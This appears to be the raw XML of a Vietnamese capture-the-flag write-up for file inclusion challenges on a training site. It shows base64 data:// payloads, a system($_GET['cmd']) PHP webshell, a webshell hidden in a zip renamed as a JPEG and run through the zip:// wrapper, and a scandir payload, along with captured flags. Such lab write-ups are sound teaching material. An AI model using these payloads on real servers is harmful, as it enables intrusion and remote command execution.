    <w:p w14:paraId="45A114F5" w14:textId="7B777EF5" w:rsidR="005E005F" w:rsidRDefault="005E005F" w:rsidP="005E005F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thì function show_source(‘index.php’) thành công (nhớ mã hóa base-64 nha) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324E86CC" w14:textId="09961B73" w:rsidR="005E005F" w:rsidRDefault="005E005F" w:rsidP="005E005F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EA7CE5C" w14:textId="69466106" w:rsidR="005E005F" w:rsidRDefault="005E005F" w:rsidP="005E005F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Payload cuối cùng là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52001402" w14:textId="680C6F49" w:rsidR="005E005F" w:rsidRDefault="005E005F" w:rsidP="005E005F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E005F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005E005F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>serveur/ch13/?lang=data://text/plain;base64,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C05058F" w14:textId="40162633" w:rsidR="005E005F" w:rsidRDefault="005E005F" w:rsidP="005E005F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E005F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PD9waHAgc2hvd19zb3VyY2UoJ2luZGV4LnBocCcpOyA/Pg==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC454D6" w14:textId="02F75536" w:rsidR="005E005F" w:rsidRDefault="005E005F" w:rsidP="005E005F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="658CA652" w14:textId="546562AB" w:rsidR="005E005F" w:rsidRDefault="005E005F" w:rsidP="005E005F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Boom! Flag là </w:t>
      </w:r>
      <w:r w:rsidRPr="005E005F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R3m0t3_iS_r3aL1y_3v1l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69902687" w14:textId="2DCF4CD2" w:rsidR="005E005F" w:rsidRDefault="005E005F" w:rsidP="005E005F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C2DD93" w14:textId="42BAF63E" w:rsidR="00BA7A9F" w:rsidRDefault="00BA7A9F" w:rsidP="005E005F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="198577F3" w14:textId="07195D60" w:rsidR="00BA7A9F" w:rsidRDefault="00BA7A9F" w:rsidP="005E005F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA7A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thử thách cuối cùng: Local File Inclusion: Wrappers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731FDA1A" w14:textId="27FF1A6C" w:rsidR="00BA7A9F" w:rsidRDefault="00BA7A9F" w:rsidP="005E005F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00A56832" w14:textId="57B6795B" w:rsidR="00BA7A9F" w:rsidRDefault="00BA7A9F" w:rsidP="005E005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Mục tiêu: lấy đc flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A7E57" w14:textId="77777777" w:rsidR="00804F43" w:rsidRDefault="00804F43" w:rsidP="005E005F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27749855" w14:textId="53B658A2" w:rsidR="00881F08" w:rsidRDefault="00881F08" w:rsidP="005E005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Đầu tiên, nó cho mình upload file</w:t>
      </w:r>
      <w:r w:rsidR="00804F43">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, nếu muốn up phải yêu cầu với url sau : </w:t>
      </w:r>
      <w:r w:rsidR="00804F43" w:rsidRPr="00804F43">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>POST /web-serveur/ch43/index.php?page=upload</w:t>
      </w:r>
      <w:r w:rsidR="00804F43">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, nếu up thành công thì xem hình ảnh bằng url:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0202E0E3" w14:textId="73BF9D19" w:rsidR="00804F43" w:rsidRDefault="00804F43" w:rsidP="005E005F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00804F43">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET /web-serveur/ch43/index.php?page=view&amp;id=ol7LbIsgO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> và file sẽ được lưu ở thư mục /tmp/upload/</w:t>
      </w:r>
      <w:r w:rsidRPr="00804F43">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ol7LbIsgO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B31724F" w14:textId="77777777" w:rsidR="00804F43" w:rsidRDefault="00804F43" w:rsidP="005E005F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="602FF7FC" w14:textId="63BC5DC2" w:rsidR="00881F08" w:rsidRDefault="00BA7A9F" w:rsidP="005E005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Bài này rất giống với mấy bài trước , khai thác cơ bản là không được</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7A9F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP Wrappers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352A89F9" w14:textId="74824810" w:rsidR="00BA7A9F" w:rsidRDefault="00BA7A9F" w:rsidP="005E005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Mà ứng dụng tự thêm đuôi .php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BE1E1D" w14:textId="447EA73B" w:rsidR="00BA7A9F" w:rsidRDefault="007265E2" w:rsidP="0034784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filter, input ko dùng được vì bị chặn php rồi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029C8BCD" w14:textId="2FEB926C" w:rsidR="00881F08" w:rsidRDefault="00804F43" w:rsidP="00881F08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/>
        </w:rPr>
      </w:pPr>
      <w:r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/>
        </w:rPr>
        <w:t>?page=</w:t>
      </w:r>
      <w:r w:rsidR="00881F08" w:rsidRPr="00881F08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/>
        </w:rPr>
        <w:t>data:// text/plain;base64,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD9C632" w14:textId="0EAC49EC" w:rsidR="00881F08" w:rsidRPr="00881F08" w:rsidRDefault="00881F08" w:rsidP="00881F08">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted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/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00881F08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US"/>
        </w:rPr>
        <w:t>PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CED4D50" w14:textId="06955598" w:rsidR="00881F08" w:rsidRDefault="00881F08" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="565C5CB7" w14:textId="76702B34" w:rsidR="00BA7A9F" w:rsidRDefault="00881F08" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">payload là : </w:t>
      </w:r>
      <w:r w:rsidRPr="00881F08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"&lt;?php system($_GET['cmd']);echo 'Shell done !'; ?&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114251D9" w14:textId="49E259E0" w:rsidR="00881F08" w:rsidRDefault="00804F43" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">thì biến page lại quá dài </w:t>
      </w:r>
      <w:r w:rsidRPr="00804F43">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04A"/>
      </w:r>
      <w:r w:rsidR="007265E2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C4DDE5" w14:textId="66816378" w:rsidR="007265E2" w:rsidRDefault="007265E2" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD1E52A" w14:textId="0B9EBF3E" w:rsidR="007265E2" w:rsidRDefault="007265E2" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>expect thì không được máy chủ cấu hình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641B7155" w14:textId="0BD7B27B" w:rsidR="007265E2" w:rsidRDefault="007265E2" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF86439" w14:textId="379C0951" w:rsidR="007265E2" w:rsidRDefault="007265E2" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mình thử làm </w:t>
      </w:r>
      <w:r w:rsidR="00AC767F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>giống DVWA file uploads high. Upload 1 file polygot có php code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EAF635" w14:textId="2CBF919D" w:rsidR="00AC767F" w:rsidRDefault="00AC767F" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rồi kích hoạt nó bằng file inclusion ?page=file</w:t>
      </w:r>
      <w:r w:rsidR="00092DA1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/../../../</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tmp/upload/</w:t>
      </w:r>
      <w:r w:rsidRPr="00804F43">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ol7LbIsgO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4201CF" w14:textId="481110A9" w:rsidR="006C0AA5" w:rsidRDefault="006C0AA5" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0AA5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> không thành công vì .jpg.php và nó chặn  .. (path traversal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B8F79D" w14:textId="4000222B" w:rsidR="006C0AA5" w:rsidRDefault="006C0AA5" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="602BA72F" w14:textId="1FF16B27" w:rsidR="006C0AA5" w:rsidRDefault="00281F9E" w:rsidP="0034784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Cách cuối cùng là zip wrapper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA86D0C" w14:textId="488781F4" w:rsidR="00C51EF7" w:rsidRDefault="00C51EF7" w:rsidP="0034784B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513F50" wp14:editId="51C49D91">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-139148</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>131638</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5118652" cy="9144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652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CA84B3" id="Rectangle 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:-10.95pt;margin-top:10.35pt;width:403.05pt;height:1in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" fillcolor="white [3201]" strokecolor="#70ad47 [3209]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2268843A" w14:textId="6612E601" w:rsidR="00281F9E" w:rsidRPr="00C51EF7" w:rsidRDefault="00C51EF7" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C51EF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00281F9E" w:rsidRPr="00C51EF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ạo 1 webshell s.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51EF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00281F9E" w:rsidRPr="00C51EF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;?php system($_GET(‘command’))?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB11D32" w14:textId="0AE63E01" w:rsidR="00281F9E" w:rsidRPr="00C51EF7" w:rsidRDefault="00281F9E" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C51EF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>zip s.zip s.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389AA168" w14:textId="199627BA" w:rsidR="00281F9E" w:rsidRPr="00C51EF7" w:rsidRDefault="00281F9E" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C51EF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mv s.zip rabbit.jpeg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD46A9B" w14:textId="7EDDB75D" w:rsidR="00281F9E" w:rsidRDefault="00281F9E" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD05603" w14:textId="39083322" w:rsidR="00C51EF7" w:rsidRDefault="00C51EF7" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9E76CC" w14:textId="074971EF" w:rsidR="00C51EF7" w:rsidRDefault="00C51EF7" w:rsidP="0034784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/index.php?zip://tmp/upload/</w:t>
      </w:r>
      <w:r w:rsidRPr="00804F43">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ol7LbIsgO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.jpg%23s.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F9A477" w14:textId="49DEC2BF" w:rsidR="00C51EF7" w:rsidRDefault="00C51EF7" w:rsidP="0034784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Cấu trúc: zip://đường dẫn đến file zip(hình ảnh)#file trong zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D47A53" w14:textId="2A774079" w:rsidR="00C51EF7" w:rsidRDefault="00C51EF7" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BF138F3" w14:textId="451A2DFE" w:rsidR="00265080" w:rsidRDefault="00265080" w:rsidP="0034784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Nó đã báo lỗi khác: ko system đc vì lí do bảo mật, tương tự  với passthru,shell_exec, execute chỉ có showsource là đc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F834EFE" w14:textId="1863334E" w:rsidR="00265080" w:rsidRDefault="00265080" w:rsidP="0034784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Thay đổi webshell &lt;?php show_source(‘index.php’)?&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EA60B8" w14:textId="2E492D54" w:rsidR="00265080" w:rsidRDefault="00265080" w:rsidP="0026508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Mình đọc thử file index, upload, view nhưng ko có flag </w:t>
      </w:r>
      <w:r w:rsidRPr="00265080">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04C"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="485CBE31" w14:textId="28F92D00" w:rsidR="00265080" w:rsidRDefault="00265080" w:rsidP="00265080">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A40329C" w14:textId="5678B0DF" w:rsidR="00265080" w:rsidRDefault="00265080" w:rsidP="0026508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Mình phải tìm cách liệt kê các file trong thư mục bằng php  mà ko cần thực thi lệnh.</w:t>
      </w:r>
      <w:r w:rsidR="001677E9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (scandir)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2641AA" w14:textId="29B201C2" w:rsidR="001677E9" w:rsidRDefault="001677E9" w:rsidP="00265080">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01EE944B" w14:textId="16CF4DDB" w:rsidR="001677E9" w:rsidRPr="001677E9" w:rsidRDefault="001677E9" w:rsidP="001677E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webshell là:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001677E9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BBA92F" w14:textId="726718FF" w:rsidR="001677E9" w:rsidRPr="001677E9" w:rsidRDefault="001677E9" w:rsidP="001677E9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001677E9"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1677E9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$dir=".";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125642CD" w14:textId="4E5F3405" w:rsidR="001677E9" w:rsidRPr="001677E9" w:rsidRDefault="001677E9" w:rsidP="001677E9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001677E9"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1677E9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$scan = scandir($dir); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124D6AF9" w14:textId="3D2CC4C7" w:rsidR="001677E9" w:rsidRPr="001677E9" w:rsidRDefault="001677E9" w:rsidP="001677E9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001677E9"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1677E9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>foreach($scan as $file){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0D8449" w14:textId="5C9382FF" w:rsidR="001677E9" w:rsidRPr="001677E9" w:rsidRDefault="001677E9" w:rsidP="001677E9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001677E9"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1677E9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo $file;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0498B658" w14:textId="46C04F42" w:rsidR="001677E9" w:rsidRPr="001677E9" w:rsidRDefault="001677E9" w:rsidP="001677E9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001677E9"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1677E9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485B2FCA" w14:textId="46C5A8A1" w:rsidR="001677E9" w:rsidRDefault="001677E9" w:rsidP="001677E9">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001677E9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451EA5D9" w14:textId="43CD5F1B" w:rsidR="001677E9" w:rsidRDefault="001677E9" w:rsidP="001677E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001677E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>...._nginx.http-level.inc._nginx.server-level.inc._perms._php-fpm.pool.inc._run.git.gitignore</w:t>
      </w:r>
      <w:r w:rsidRPr="001677E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>flag-mipkBswUppqwXlq9ZydO.php</w:t>
      </w:r>
      <w:r w:rsidRPr="001677E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">index.phptmpupload.phpview.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C67084" w14:textId="2FD74C66" w:rsidR="001677E9" w:rsidRDefault="001677E9" w:rsidP="001677E9">
      <w:pPr>
        <w:rPr>
